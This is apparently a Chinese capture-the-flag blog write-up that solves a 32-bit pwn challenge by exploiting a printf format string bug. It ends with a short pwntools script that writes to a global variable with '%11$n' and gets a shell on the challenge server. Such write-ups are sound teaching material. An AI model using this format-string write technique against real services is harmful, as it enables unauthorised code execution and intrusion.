编辑
2023-04-29
pwn
00
请注意,本文编写于 721 天前,最后修改于 718 天前,其中某些信息可能已经过时。

目录

字符串格式化
exp

字符串格式化

首先还是查看文件保护: image-20230411212811968

image-20230411212825976

拖进32位ida查看:

image-20230411212910628

一眼就看到system('/bin/sh'),而条件则是x==4,所以我们的目的就是让x的值变成4.

程序里面printf一眼就可以知道这题应该是利用字符串格式化漏洞。

image-20230424184955291

所以我们先需要知道输入的buf所在的位置,通过如图方式泄露可以知道aaaa的位置是在第十一位。

然后我们需要查看x的地址:

image-20230424185143117

这样将x的地址写入再利用%?$n把?处地址上的数据改写。

exp

python
from pwn import* io = remote('node4.buuoj.cn',28081) x_addr = 0x0804A02C payload =p32(x_addr)+b'%11$n' io.send(payload) io.interactive()

image-20230424185330426

如果对你有用的话,可以打赏哦
打赏
ali pay
wechat pay

本文作者:Hyrink

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!